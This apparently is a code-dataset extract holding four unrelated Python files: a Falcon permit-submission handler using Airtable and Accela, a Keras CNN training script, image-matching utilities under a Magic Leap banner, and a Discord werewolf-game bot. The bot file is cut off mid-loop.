source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
submission.py
|
"""Submission module"""
#pylint: disable=too-few-public-methods
import os
import sys
import json
import datetime
import threading
import falcon
import jsend
import sentry_sdk
from .dispatch_email import Email
from .dispatch_bluebeam import DispatchBluebeam
from .hooks import validate_access
from ..modules.util import timer
from ..modules.accela import Accela
from ..modules.formio import Formio
from ..modules.common import get_airtable, has_option_req
from ..transforms.submission_transform import SubmissionTransform
@falcon.before(validate_access)
class Submission():
"""Submission class"""
def on_post(self, req, resp):
#pylint: disable=no-self-use,too-many-locals,too-many-statements
"""
on post request
"""
if req.content_length:
data = req.stream.read(sys.maxsize)
data_json = json.loads(data)
with sentry_sdk.configure_scope() as scope:
scope.set_extra('data_json', data_json)
if 'id' in data_json:
# get submission json
submission_id = data_json['id']
accela_prj_id = "" # placeholder accela_prj variable
accela_sys_id = "" # placeholder accela_sys_id variable
enable_bluebeam = has_option_req(req, 'BLUEBEAM')
send_email = has_option_req(req, 'EMAIL')
with sentry_sdk.configure_scope() as scope:
scope.set_extra('enable_bluebeam', enable_bluebeam)
scope.set_extra('send_email', send_email)
submission_json = self.get_submssion_json(submission_id)
# init airtable
airtable = get_airtable()
# log submission
insert = self.create_submission_airtable(airtable, submission_id, submission_json)
airtable_id = insert["id"]
# transform submission into record
record_json = SubmissionTransform().accela_transform(submission_json)
# send record to accela
response = Accela.send_record_to_accela(record_json)
with sentry_sdk.configure_scope() as scope:
scope.set_extra('accela_resp_status_code', response.status_code)
scope.set_extra('accela_resp_json', response.json())
if response.status_code == 200:
accela_json = response.json()
accela_prj_id = accela_json['result']['customId']
accela_sys_id = accela_json['result']['id']
self.update_submission_airtable(airtable, airtable_id, accela_json)
#pylint: disable=line-too-long
sentry_sdk.capture_message(
'ADU Intake {submission_id} {accela_env} {accela_prj_id} {accela_sys_id}'.format(
submission_id=submission_id,
accela_prj_id=accela_prj_id,
accela_sys_id=accela_sys_id,
accela_env=os.environ.get('ACCELA_ENV')
), 'info')
if enable_bluebeam:
accela_json['airtable'] = {"id": airtable_id}
# threading bluebeam submission
thread = threading.Thread(target=DispatchBluebeam.trigger_bluebeam_submission, args=(airtable_id, send_email))
thread.start()
else:
if send_email:
emails_sent = Email.send_submission_email_by_airtable_id(airtable_id)
response_emails = Accela.send_email_to_accela(
accela_json['result']['id'], emails_sent['EMAILS'])
accela_json['emails'] = response_emails.json()
msg = accela_json
resp.body = json.dumps(jsend.success(msg))
resp.status = falcon.HTTP_200
with sentry_sdk.configure_scope() as scope:
scope.set_extra('msg_json', msg)
#pylint: disable=line-too-long
sentry_sdk.capture_message(
'ADU Intake Success {submission_id} {accela_env} {accela_prj_id} {accela_sys_id}'.format(
submission_id=submission_id,
accela_prj_id=accela_prj_id,
accela_sys_id=accela_sys_id,
accela_env=os.environ.get('ACCELA_ENV')
), 'info')
return
with sentry_sdk.configure_scope() as scope:
scope.set_extra('accela_response_status_code', response.status_code)
scope.set_extra('accela_response_json', response.json())
# catch-all
resp.status = falcon.HTTP_400
msg = "The create record information is missing"
resp.body = json.dumps(jsend.error(msg))
sentry_sdk.capture_message('ADU Inake Error', 'error')
return
@staticmethod
@timer
def create_submission_airtable(airtable, submission_id, submission_json):
""" Create submission into AirTable """
return airtable.insert({
'FORMIO_ID': submission_id,
'SUBMISSION_DATE': submission_json['created'],
'PROJECT_ADDRESS': submission_json['data']['projectAddress'],
'FIRST_NAME': submission_json['data']['firstName'],
'LAST_NAME': submission_json['data']['lastName'],
'EMAIL': submission_json['data']['email'],
'NUM_PROPOSED_ADU': len(submission_json['data']['proposedAdUs']),
'SITE_PERMIT': submission_json['data']['sitePermit'],
'BLUEBEAM_UPLOADS': json.dumps(
SubmissionTransform().bluebeam_transform(submission_json)
),
'ACCELA_ENV': os.environ.get('ACCELA_ENV')
})
@staticmethod
@timer
def update_submission_airtable(airtable, airtable_id, accela_json):
""" Update submission into Airtable """
fields = {
'ACCELA_PRJ_ID': accela_json['result']['customId'],
'ACCELA_SYS_ID': accela_json['result']['id'],
'ACCELA_CREATED_DATE': datetime.datetime.now(datetime.timezone.utc).isoformat()
}
update = airtable.update(airtable_id, fields)
return update
@staticmethod
@timer
def get_submssion_json(submission_id):
""" Get Submission JSON """
submission_json = Formio.get_formio_submission_by_id(
submission_id, form_id=os.environ.get('FORMIO_FORM_ID_ADU'))
return submission_json
|
train-cnn.py
|
import sys
import numpy as np
import pprint
import time
import os
import argparse as argparse
import json
import hvutils as hv
import threading
import queue
from tqdm import tqdm
from random import shuffle
from keras import layers
from keras.models import Model, Sequential
from keras.layers import Input, Add, Dense, Activation, ZeroPadding2D, BatchNormalization, Flatten, Conv2D, AveragePooling2D, MaxPooling2D, GlobalMaxPooling2D, Dropout
from keras.utils import np_utils
from keras.callbacks import History
from keras.initializers import glorot_uniform
def makeModel(input_shape = (100,100,1), classes = 10):
#hv.set_tf_session_for_keras(memory_fraction=1.0)
X_input = Input(input_shape)
#X = ZeroPadding2D((3,3))(X_input)
X = Dropout(0.01)(X_input)
X = Conv2D(filters=3, kernel_size= (3,3), strides = (1,1), name='conv1', padding='valid', kernel_initializer='glorot_uniform')(X)
#X = BatchNormalization(axis = 3, name = 'bn_conv1')(X)
X = Activation('relu')(X)
#X = MaxPooling2D(pool_size=(3,3), strides=(2,2))(X)
X = Conv2D(filters=20, kernel_size=(5,5), strides = (1,1), name='conv2', padding='valid', kernel_initializer='glorot_uniform')(X)
#X = BatchNormalization(axis = 3, name = 'bn_conv2')(X)
X = Activation('relu')(X)
#X = MaxPooling2D(pool_size=(5,5), strides=(1,1))(X)
X = Conv2D(filters=30, kernel_size=(7,7), strides = (1,1), name='conv3', padding='valid', kernel_initializer='glorot_uniform')(X)
#X = BatchNormalization(axis = 3, name = 'bn_conv3')(X)
X = Activation('relu')(X)
#X = MaxPooling2D(pool_size=(2,2), strides=(1,1))(X)
# X = Conv2D(filters=512, kernel_size=(9,9), strides = (1,1), name='conv4', padding='valid', kernel_initializer='glorot_uniform')(X)
# X = BatchNormalization(axis = 3, name = 'bn_conv4')(X)
# X = Activation('relu')(X)
#X = MaxPooling2D(pool_size=(2,2), strides=(1,1))(X)
X = Flatten()(X)
X = Dense(classes, activation='softmax', name='fc' + str(classes), kernel_initializer = glorot_uniform())(X)
model = Model(inputs = X_input, outputs = X, name = '4layers')
return model
def testModel(model, num_dev_files, dev_files_list, classes, mini_batch_size, imgdim):
num_mini_batches = num_dev_files // mini_batch_size
loss,acc = None, None
for bno in tqdm(range(0,num_mini_batches)):
X_test_orig, Y_test_orig = hv.load_minibatch(classes, dev_files_list, mini_batch_size, bno, imgdim)
X_test = X_test_orig/255
_, Y_test = hv.convert_to_one_hot(classes, Y_test_orig)
loss,acc = model.test_on_batch(X_test, Y_test)
print ("Loss [{}] Acc [{}] ".format(str(loss),str(acc)))
batch_data = queue.Queue()
def minibatchLoader(classes, train_files_list, num_mini_batches, mini_batch_size, bno, imgdim):
while bno < num_mini_batches:
while batch_data.qsize() > 50:
if threading.main_thread().is_alive() is False:
print("Main thread exited, data loader exiting")
return
#print("sleeping")
time.sleep(0.1)
X_train_orig, Y_train_orig = hv.load_minibatch(classes, train_files_list, mini_batch_size, bno, imgdim)
X = X_train_orig/255
_, Y = hv.convert_to_one_hot(classes, Y_train_orig)
batch_data.put((X,Y))
#print("loaded batch {}".format(bno))
bno += 1
def trainOnData(dataPath, saveDest , train_loss, num_epochs, mini_batch_size, imgdim=(100,100,1)):
print("Making data set from path ", dataPath)
num_train_files, num_dev_files, tmp_keys, train_files_list, dev_files_list, classes = hv.make_dataset(dataPath, 0.2, imgdim)
num_mini_batches = num_train_files // mini_batch_size
print ("number of training examples = " + str(num_train_files))
print ("number of test examples = " + str(num_dev_files))
model = makeModel(imgdim, len(classes))
model.compile(loss=train_loss, optimizer='adam', metrics=['accuracy'])
for epoch in range(0, num_epochs):
#shuffle the file list
shuffle(train_files_list)
threading.Thread(target = minibatchLoader, args=(classes, train_files_list,num_mini_batches, mini_batch_size, 0, imgdim)).start()
print("\nEpoch {}/{}".format(epoch,num_epochs))
for bno in tqdm(range(0,num_mini_batches)):
#t_1 = time.time()
X,Y = batch_data.get()
#t_2 = time.time()
model.train_on_batch(X, Y)
#t_3 = time.time()
#print("Took [{}] s to load, and [{}] s to train on mini batch".format((t_2-t_1),(t_3-t_2)))
testModel(model, num_dev_files, dev_files_list, classes, mini_batch_size, imgdim)
#done with mini batches, now test
print("\nRunning final evaluation.....")
X_test_orig, Y_test_orig = hv.load_minibatch(classes, dev_files_list, num_dev_files, 0, imgdim)
X_test = X_test_orig/255
_, Y_test = hv.convert_to_one_hot(classes, Y_test_orig)
preds = model.evaluate(X_test, Y_test, batch_size=mini_batch_size)
print ("Loss = " + str(preds[0]))
print ("Test Accuracy = " + str(preds[1]))
hv.saveModel(model, saveDest, classes)
if __name__ == "__main__":
ap = argparse.ArgumentParser()
ap.add_argument("-dp", "--data.path", required=True,
help="folder containing sub folders with images")
ap.add_argument("-dl", "--dest.loc", required=True,
help="where to save the trained model")
ap.add_argument("-iw", "--img.width", required=True,
help="width of the image")
ap.add_argument("-ih", "--img.height", required=True,
help="height of the image.")
ap.add_argument("-ic", "--img.chan", default=3,
help="channels in the image")
ap.add_argument("-te", "--train.epoch", default=2,
help="number of epochs")
ap.add_argument("-tl", "--train.loss", default='categorical_crossentropy',
help="loss function")
ap.add_argument("-mb", "--minibatch.size", default=1024,
help="size of images to include in each mini batch, keep to a multiple of 2")
args = vars(ap.parse_args())
imgdim = (int(args["img.height"]), int(args["img.width"]), int(args["img.chan"]))
trainOnData(args["data.path"], args["dest.loc"], args["train.loss"], int(args["train.epoch"]), int(args["minibatch.size"]),imgdim)
print("\n\nDone...")
|
utils.py
|
# %BANNER_BEGIN%
# ---------------------------------------------------------------------
# %COPYRIGHT_BEGIN%
#
# Magic Leap, Inc. ("COMPANY") CONFIDENTIAL
#
# Unpublished Copyright (c) 2020
# Magic Leap, Inc., All Rights Reserved.
#
# NOTICE: All information contained herein is, and remains the property
# of COMPANY. The intellectual and technical concepts contained herein
# are proprietary to COMPANY and may be covered by U.S. and Foreign
# Patents, patents in process, and are protected by trade secret or
# copyright law. Dissemination of this information or reproduction of
# this material is strictly forbidden unless prior written permission is
# obtained from COMPANY. Access to the source code contained herein is
# hereby forbidden to anyone except current COMPANY employees, managers
# or contractors who have executed Confidentiality and Non-disclosure
# agreements explicitly covering such access.
#
# The copyright notice above does not evidence any actual or intended
# publication or disclosure of this source code, which includes
# information that is confidential and/or proprietary, and is a trade
# secret, of COMPANY. ANY REPRODUCTION, MODIFICATION, DISTRIBUTION,
# PUBLIC PERFORMANCE, OR PUBLIC DISPLAY OF OR THROUGH USE OF THIS
# SOURCE CODE WITHOUT THE EXPRESS WRITTEN CONSENT OF COMPANY IS
# STRICTLY PROHIBITED, AND IN VIOLATION OF APPLICABLE LAWS AND
# INTERNATIONAL TREATIES. THE RECEIPT OR POSSESSION OF THIS SOURCE
# CODE AND/OR RELATED INFORMATION DOES NOT CONVEY OR IMPLY ANY RIGHTS
# TO REPRODUCE, DISCLOSE OR DISTRIBUTE ITS CONTENTS, OR TO MANUFACTURE,
# USE, OR SELL ANYTHING THAT IT MAY DESCRIBE, IN WHOLE OR IN PART.
#
# %COPYRIGHT_END%
# ----------------------------------------------------------------------
# %AUTHORS_BEGIN%
#
# Originating Authors: Paul-Edouard Sarlin
# Daniel DeTone
# Tomasz Malisiewicz
#
# %AUTHORS_END%
# --------------------------------------------------------------------*/
# %BANNER_END%
from pathlib import Path
import time
from collections import OrderedDict
from threading import Thread
import numpy as np
import cv2
import torch
import matplotlib.pyplot as plt
import matplotlib
matplotlib.use('Agg')
class AverageTimer:
""" Class to help manage printing simple timing of code execution. """
def __init__(self, smoothing=0.3, newline=False):
self.smoothing = smoothing
self.newline = newline
self.times = OrderedDict()
self.will_print = OrderedDict()
self.reset()
def reset(self):
now = time.time()
self.start = now
self.last_time = now
for name in self.will_print:
self.will_print[name] = False
def update(self, name='default'):
now = time.time()
dt = now - self.last_time
if name in self.times:
dt = self.smoothing * dt + (1 - self.smoothing) * self.times[name]
self.times[name] = dt
self.will_print[name] = True
self.last_time = now
def print(self, text='Timer'):
total = 0.
print('[{}]'.format(text), end=' ')
for key in self.times:
val = self.times[key]
if self.will_print[key]:
print('%s=%.3f' % (key, val), end=' ')
total += val
print('total=%.3f sec {%.1f FPS}' % (total, 1./total), end=' ')
if self.newline:
print(flush=True)
else:
print(end='\r', flush=True)
self.reset()
class VideoStreamer:
""" Class to help process image streams. Four types of possible inputs:"
1.) USB Webcam.
2.) An IP camera
3.) A directory of images (files in directory matching 'image_glob').
4.) A video file, such as an .mp4 or .avi file.
"""
def __init__(self, basedir, resize, skip, image_glob, max_length=1000000):
self._ip_grabbed = False
self._ip_running = False
self._ip_camera = False
self._ip_image = None
self._ip_index = 0
self.cap = []
self.camera = True
self.video_file = False
self.listing = []
self.resize = resize
self.interp = cv2.INTER_AREA
self.i = 0
self.skip = skip
self.max_length = max_length
if isinstance(basedir, int) or basedir.isdigit():
print('==> Processing USB webcam input: {}'.format(basedir))
self.cap = cv2.VideoCapture(int(basedir))
self.listing = range(0, self.max_length)
elif basedir.startswith(('http', 'rtsp')):
print('==> Processing IP camera input: {}'.format(basedir))
self.cap = cv2.VideoCapture(basedir)
self.start_ip_camera_thread()
self._ip_camera = True
self.listing = range(0, self.max_length)
elif Path(basedir).is_dir():
print('==> Processing image directory input: {}'.format(basedir))
self.listing = list(Path(basedir).glob(image_glob[0]))
for j in range(1, len(image_glob)):
image_path = list(Path(basedir).glob(image_glob[j]))
self.listing = self.listing + image_path
self.listing.sort()
self.listing = self.listing[::self.skip]
self.max_length = np.min([self.max_length, len(self.listing)])
if self.max_length == 0:
raise IOError('No images found (maybe bad \'image_glob\' ?)')
self.listing = self.listing[:self.max_length]
self.camera = False
elif Path(basedir).exists():
print('==> Processing video input: {}'.format(basedir))
self.cap = cv2.VideoCapture(basedir)
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 1)
num_frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
self.listing = range(0, num_frames)
self.listing = self.listing[::self.skip]
self.video_file = True
self.max_length = np.min([self.max_length, len(self.listing)])
self.listing = self.listing[:self.max_length]
else:
raise ValueError('VideoStreamer input \"{}\" not recognized.'.format(basedir))
if self.camera and not self.cap.isOpened():
raise IOError('Could not read camera')
def load_image(self, impath):
""" Read image as grayscale and resize to img_size.
Inputs
impath: Path to input image.
Returns
grayim: uint8 numpy array sized H x W.
"""
grayim = cv2.imread(impath, 0)
if grayim is None:
raise Exception('Error reading image %s' % impath)
w, h = grayim.shape[1], grayim.shape[0]
w_new, h_new = process_resize(w, h, self.resize)
grayim = cv2.resize(
grayim, (w_new, h_new), interpolation=self.interp)
return grayim
def next_frame(self):
""" Return the next frame, and increment internal counter.
Returns
image: Next H x W image.
status: True or False depending whether image was loaded.
"""
if self.i == self.max_length:
return (None, False)
if self.camera:
if self._ip_camera:
#Wait for first image, making sure we haven't exited
while self._ip_grabbed is False and self._ip_exited is False:
time.sleep(.001)
ret, image = self._ip_grabbed, self._ip_image.copy()
if ret is False:
self._ip_running = False
else:
ret, image = self.cap.read()
if ret is False:
print('VideoStreamer: Cannot get image from camera')
return (None, False)
w, h = image.shape[1], image.shape[0]
if self.video_file:
self.cap.set(cv2.CAP_PROP_POS_FRAMES, self.listing[self.i])
w_new, h_new = process_resize(w, h, self.resize)
image = cv2.resize(image, (w_new, h_new),
interpolation=self.interp)
image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
else:
image_file = str(self.listing[self.i])
image = self.load_image(image_file)
self.i = self.i + 1
return (image, True)
def start_ip_camera_thread(self):
self._ip_thread = Thread(target=self.update_ip_camera, args=())
self._ip_running = True
self._ip_thread.start()
self._ip_exited = False
return self
def update_ip_camera(self):
while self._ip_running:
ret, img = self.cap.read()
if ret is False:
self._ip_running = False
self._ip_exited = True
self._ip_grabbed = False
return
self._ip_image = img
self._ip_grabbed = ret
self._ip_index += 1
#print('IPCAMERA THREAD got frame {}'.format(self._ip_index))
def cleanup(self):
self._ip_running = False
# --- PREPROCESSING ---
def process_resize(w, h, resize):
assert(len(resize) > 0 and len(resize) <= 2)
if len(resize) == 1 and resize[0] > -1:
scale = resize[0] / max(h, w)
w_new, h_new = int(round(w*scale)), int(round(h*scale))
elif len(resize) == 1 and resize[0] == -1:
w_new, h_new = w, h
else: # len(resize) == 2:
w_new, h_new = resize[0], resize[1]
# Issue warning if resolution is too small or too large.
if max(w_new, h_new) < 160:
print('Warning: input resolution is very small, results may vary')
elif max(w_new, h_new) > 2000:
print('Warning: input resolution is very large, results may vary')
return w_new, h_new
def frame2tensor(frame, device):
return torch.from_numpy(frame/255.).float()[None, None].to(device)
def read_image(path, device, resize, rotation, resize_float):
image = cv2.imread(str(path), cv2.IMREAD_GRAYSCALE)
if image is None:
return None, None, None
w, h = image.shape[1], image.shape[0]
w_new, h_new = process_resize(w, h, resize)
scales = (float(w) / float(w_new), float(h) / float(h_new))
if resize_float:
image = cv2.resize(image.astype('float32'), (w_new, h_new))
else:
image = cv2.resize(image, (w_new, h_new)).astype('float32')
if rotation != 0:
image = np.rot90(image, k=rotation)
if rotation % 2:
scales = scales[::-1]
inp = frame2tensor(image, device)
return image, inp, scales
# --- GEOMETRY ---
def estimate_pose(kpts0, kpts1, K0, K1, thresh, conf=0.99999):
if len(kpts0) < 5:
return None
f_mean = np.mean([K0[0, 0], K1[1, 1], K0[0, 0], K1[1, 1]])
norm_thresh = thresh / f_mean
kpts0 = (kpts0 - K0[[0, 1], [2, 2]][None]) / K0[[0, 1], [0, 1]][None]
kpts1 = (kpts1 - K1[[0, 1], [2, 2]][None]) / K1[[0, 1], [0, 1]][None]
E, mask = cv2.findEssentialMat(
kpts0, kpts1, np.eye(3), threshold=norm_thresh, prob=conf,
method=cv2.RANSAC)
assert E is not None
best_num_inliers = 0
ret = None
for _E in np.split(E, len(E) / 3):
n, R, t, _ = cv2.recoverPose(
_E, kpts0, kpts1, np.eye(3), 1e9, mask=mask)
if n > best_num_inliers:
best_num_inliers = n
ret = (R, t[:, 0], mask.ravel() > 0)
return ret
def rotate_intrinsics(K, image_shape, rot):
"""image_shape is the shape of the image after rotation"""
assert rot <= 3
h, w = image_shape[:2][::-1 if (rot % 2) else 1]
fx, fy, cx, cy = K[0, 0], K[1, 1], K[0, 2], K[1, 2]
rot = rot % 4
if rot == 1:
return np.array([[fy, 0., cy],
[0., fx, w-1-cx],
[0., 0., 1.]], dtype=K.dtype)
elif rot == 2:
return np.array([[fx, 0., w-1-cx],
[0., fy, h-1-cy],
[0., 0., 1.]], dtype=K.dtype)
else: # if rot == 3:
return np.array([[fy, 0., h-1-cy],
[0., fx, cx],
[0., 0., 1.]], dtype=K.dtype)
def rotate_pose_inplane(i_T_w, rot):
rotation_matrices = [
np.array([[np.cos(r), -np.sin(r), 0., 0.],
[np.sin(r), np.cos(r), 0., 0.],
[0., 0., 1., 0.],
[0., 0., 0., 1.]], dtype=np.float32)
for r in [np.deg2rad(d) for d in (0, 270, 180, 90)]
]
return np.dot(rotation_matrices[rot], i_T_w)
def scale_intrinsics(K, scales):
scales = np.diag([1./scales[0], 1./scales[1], 1.])
return np.dot(scales, K)
def to_homogeneous(points):
return np.concatenate([points, np.ones_like(points[:, :1])], axis=-1)
def compute_epipolar_error(kpts0, kpts1, T_0to1, K0, K1):
kpts0 = (kpts0 - K0[[0, 1], [2, 2]][None]) / K0[[0, 1], [0, 1]][None]
kpts1 = (kpts1 - K1[[0, 1], [2, 2]][None]) / K1[[0, 1], [0, 1]][None]
kpts0 = to_homogeneous(kpts0)
kpts1 = to_homogeneous(kpts1)
t0, t1, t2 = T_0to1[:3, 3]
t_skew = np.array([
[0, -t2, t1],
[t2, 0, -t0],
[-t1, t0, 0]
])
E = t_skew @ T_0to1[:3, :3]
Ep0 = kpts0 @ E.T # N x 3
p1Ep0 = np.sum(kpts1 * Ep0, -1) # N
Etp1 = kpts1 @ E # N x 3
d = p1Ep0**2 * (1.0 / (Ep0[:, 0]**2 + Ep0[:, 1]**2)
+ 1.0 / (Etp1[:, 0]**2 + Etp1[:, 1]**2))
return d
def angle_error_mat(R1, R2):
cos = (np.trace(np.dot(R1.T, R2)) - 1) / 2
cos = np.clip(cos, -1., 1.) # numercial errors can make it out of bounds
return np.rad2deg(np.abs(np.arccos(cos)))
def angle_error_vec(v1, v2):
n = np.linalg.norm(v1) * np.linalg.norm(v2)
return np.rad2deg(np.arccos(np.clip(np.dot(v1, v2) / n, -1.0, 1.0)))
def compute_pose_error(T_0to1, R, t):
R_gt = T_0to1[:3, :3]
t_gt = T_0to1[:3, 3]
error_t = angle_error_vec(t, t_gt)
error_t = np.minimum(error_t, 180 - error_t) # ambiguity of E estimation
error_R = angle_error_mat(R, R_gt)
return error_t, error_R
def pose_auc(errors, thresholds):
sort_idx = np.argsort(errors)
errors = np.array(errors.copy())[sort_idx]
recall = (np.arange(len(errors)) + 1) / len(errors)
errors = np.r_[0., errors]
recall = np.r_[0., recall]
aucs = []
for t in thresholds:
last_index = np.searchsorted(errors, t)
r = np.r_[recall[:last_index], recall[last_index-1]]
e = np.r_[errors[:last_index], t]
aucs.append(np.trapz(r, x=e)/t)
return aucs
# --- VISUALIZATION ---
def plot_image_pair(imgs, dpi=100, size=6, pad=.5):
n = len(imgs)
assert n == 2, 'number of images must be two'
figsize = (size*n, size*3/4) if size is not None else None
_, ax = plt.subplots(1, n, figsize=figsize, dpi=dpi)
for i in range(n):
ax[i].imshow(imgs[i], cmap=plt.get_cmap('gray'), vmin=0, vmax=255)
ax[i].get_yaxis().set_ticks([])
ax[i].get_xaxis().set_ticks([])
for spine in ax[i].spines.values(): # remove frame
spine.set_visible(False)
plt.tight_layout(pad=pad)
def plot_keypoints(kpts0, kpts1, color='w', ps=2):
ax = plt.gcf().axes
ax[0].scatter(kpts0[:, 0], kpts0[:, 1], c=color, s=ps)
ax[1].scatter(kpts1[:, 0], kpts1[:, 1], c=color, s=ps)
def plot_matches(kpts0, kpts1, color, lw=1.5, ps=4):
fig = plt.gcf()
ax = fig.axes
fig.canvas.draw()
transFigure = fig.transFigure.inverted()
fkpts0 = transFigure.transform(ax[0].transData.transform(kpts0))
fkpts1 = transFigure.transform(ax[1].transData.transform(kpts1))
fig.lines = [matplotlib.lines.Line2D(
(fkpts0[i, 0], fkpts1[i, 0]), (fkpts0[i, 1], fkpts1[i, 1]), zorder=1,
transform=fig.transFigure, c=color[i], linewidth=lw)
for i in range(len(kpts0))]
ax[0].scatter(kpts0[:, 0], kpts0[:, 1], c=color, s=ps)
ax[1].scatter(kpts1[:, 0], kpts1[:, 1], c=color, s=ps)
def make_matching_plot(image0, image1, kpts0, kpts1, mkpts0, mkpts1,
color, text, path, show_keypoints=False,
fast_viz=False, opencv_display=False,
opencv_title='matches', small_text=[]):
if fast_viz:
make_matching_plot_fast(image0, image1, kpts0, kpts1, mkpts0, mkpts1,
color, text, path, show_keypoints, 10,
opencv_display, opencv_title, small_text)
return
plot_image_pair([image0, image1])
if show_keypoints:
plot_keypoints(kpts0, kpts1, color='k', ps=4)
plot_keypoints(kpts0, kpts1, color='w', ps=2)
plot_matches(mkpts0, mkpts1, color)
fig = plt.gcf()
txt_color = 'k' if image0[:100, :150].mean() > 200 else 'w'
fig.text(
0.01, 0.99, '\n'.join(text), transform=fig.axes[0].transAxes,
fontsize=15, va='top', ha='left', color=txt_color)
txt_color = 'k' if image0[-100:, :150].mean() > 200 else 'w'
fig.text(
0.01, 0.01, '\n'.join(small_text), transform=fig.axes[0].transAxes,
fontsize=5, va='bottom', ha='left', color=txt_color)
plt.savefig(str(path), bbox_inches='tight', pad_inches=0)
plt.close()
def make_matching_plot_fast(image0, image1, kpts0, kpts1, mkpts0,
mkpts1, color, text, path=None,
show_keypoints=False, margin=10,
opencv_display=False, opencv_title='',
small_text=[]):
H0, W0 = image0.shape
H1, W1 = image1.shape
H, W = max(H0, H1), W0 + W1 + margin
out = 255*np.ones((H, W), np.uint8)
out[:H0, :W0] = image0
out[:H1, W0+margin:] = image1
out = np.stack([out]*3, -1)
if show_keypoints:
kpts0, kpts1 = np.round(kpts0).astype(int), np.round(kpts1).astype(int)
white = (255, 255, 255)
black = (0, 0, 0)
for x, y in kpts0:
cv2.circle(out, (x, y), 2, black, -1, lineType=cv2.LINE_AA)
cv2.circle(out, (x, y), 1, white, -1, lineType=cv2.LINE_AA)
for x, y in kpts1:
cv2.circle(out, (x + margin + W0, y), 2, black, -1,
lineType=cv2.LINE_AA)
cv2.circle(out, (x + margin + W0, y), 1, white, -1,
lineType=cv2.LINE_AA)
mkpts0, mkpts1 = np.round(mkpts0).astype(int), np.round(mkpts1).astype(int)
color = (np.array(color[:, :3])*255).astype(int)[:, ::-1]
for (x0, y0), (x1, y1), c in zip(mkpts0, mkpts1, color):
c = c.tolist()
rc = (np.random.randint(32,196), np.random.randint(32,196), np.random.randint(32,196))
cv2.line(out, (x0, y0), (x1 + margin + W0, y1),
color=rc, thickness=1, lineType=cv2.LINE_AA)
# display line end-points as circles
cv2.circle(out, (x0, y0), 2, c, -1, lineType=cv2.LINE_AA)
cv2.circle(out, (x1 + margin + W0, y1), 2, c, -1,
lineType=cv2.LINE_AA)
# Scale factor for consistent visualization across scales.
sc = min(H / 640., 2.0)
# Big text.
Ht = int(30 * sc) # text height
txt_color_fg = (255, 255, 255)
txt_color_bg = (0, 0, 0)
for i, t in enumerate(text):
cv2.putText(out, t, (int(8*sc), Ht*(i+1)), cv2.FONT_HERSHEY_DUPLEX,
1.0*sc, txt_color_bg, 2, cv2.LINE_AA)
cv2.putText(out, t, (int(8*sc), Ht*(i+1)), cv2.FONT_HERSHEY_DUPLEX,
1.0*sc, txt_color_fg, 1, cv2.LINE_AA)
# Small text.
Ht = int(18 * sc) # text height
for i, t in enumerate(reversed(small_text)):
cv2.putText(out, t, (int(8*sc), int(H-Ht*(i+.6))), cv2.FONT_HERSHEY_DUPLEX,
0.5*sc, txt_color_bg, 2, cv2.LINE_AA)
cv2.putText(out, t, (int(8*sc), int(H-Ht*(i+.6))), cv2.FONT_HERSHEY_DUPLEX,
0.5*sc, txt_color_fg, 1, cv2.LINE_AA)
if path is not None:
cv2.imwrite(str(path), out)
if opencv_display:
cv2.imshow(opencv_title, out)
cv2.waitKey(1)
return out
def error_colormap(x):
return np.clip(
np.stack([2-x*2, x*2, np.zeros_like(x), np.ones_like(x)], -1), 0, 1)
|
run_Bot.py
|
#===== description =====#
"""
DiscordJinroGame
Copyright (c) 2018 brave99
This software is released under the MIT License.
http://opensource.org/licenses/mit-license.php
This script is a discord bot that can be a GM of OneNightJinro game.
Required libraly is only "discord.py"
Have fun with your BOT!!
English version is coming soon...
"""
#===== modules =====#
import discord
from time import sleep
from threading import Thread, Event
from queue import Queue
import configparser
import random
#===== global =====#
config = configparser.SafeConfigParser()
config.read('option.ini', encoding = 'utf8')
client = discord.Client()
GAME = discord.Game(name = "OneNightJinro")
CHANNEL = None#discord.channel(id=config["BOT"]["CHANNEL"])
STARTED = False
STATEMENT = "hoge"
send = Queue()
receive = Queue()
#receive for discord to game, send for game to discord
#===== gameplay =====#
players = []
#===== script =====#
#===== bot =====#
@client.event
async def on_ready():
global CHANNEL
CHANNEL = client.get_channel(config["BOT"]["CHANNEL"])
print('Logged in as')
print(client.user.name)
print(client.user.id)
print(CHANNEL)
print('------')
await client.send_message(CHANNEL, 'ブンブンハローDISCORD')
await client.send_message(CHANNEL, '"/start" でゲームを開始します。\n"/restart"で再起動、"/shutdown"で終了します。')
@client.event
async def on_message(message):
global STARTED
global CHANNEL
global players
if message.content.startswith("/restart"):
await client.send_message(message.channel, "I'll be back...")
client.change_presence(game = None)
client.logout()
client.close()
sleep(3)
client.run(config["BOT"]["TOKEN"])
STARTED = False
players = []
elif message.content.startswith("/shutdown"):
if client.user != message.author:
await client.send_message(message.channel, "Bye!!")
client.close()
client.logout()
exit(0)
if not STARTED:
if message.content.startswith("/start"):
if client.user != message.author:
await client.send_message(CHANNEL, "ワンナイト人狼ゲームを始めます。")
await client.change_presence(game = GAME)
await client.send_message(CHANNEL, '参加したい人は"/join"と入力。')
await client.send_message(CHANNEL, '全員の入力が終わったら"/go"と入力。')
STARTED = True
elif STARTED:
if message.content.startswith("/join"):
if client.user != message.author:
p = []
for player in players:
p.append(player.discord)
if message.author in p:
await client.send_message(CHANNEL, "{} はもう登録済みです。".format(message.author.name))
else:
hoge = Player(message.author)
players.append(hoge)
await client.send_message(CHANNEL, "{} を登録しました。".format(send.get()))
elif message.content.startswith("/go"):
if len(players)<3:
await client.send_message(CHANNEL, "3人以上いないとプレイできません。再度/startからやりなおしてください。")
else:
await client.send_message(CHANNEL, "全員の準備が完了しました。夜のアクションに入ります。\nアクションはDMで行います。")
deck = makeDeck(len(players))
playable, remaining = decideRole(deck)
for x, player in enumerate(players):
player.role = playable[x]
for player in players:
await client.send_message(player.discord, '{} のターンです。'.format(player.name))
act = Thread(target = player.action, args = (players,remaining,), name = "act")
act.start()
while True:
state = send.get()
if state[0] == "end":
await client.send_message(player.discord, state[1])
break
elif state[0] == "exc":
await client.send_message(player.discord, state[1])
else:
await client.send_message(player.discord, state[1])
message = await client.wait_for_message(author = player.discord)#, content=state[0])
receive.put(message.content)
players = swapThief(players)
await client.send_message(CHANNEL, '全員のアクションが完了したので、誰を処刑するか話し合いを始めてください。\n話し合いが終わったら"/ready"と入力。')
message = await client.wait_for_message(channel = CHANNEL, content = "/ready")
await client.send_message(CHANNEL, 'それでは、投票に入ります。\n投票もDMで行います。')
for player in players:
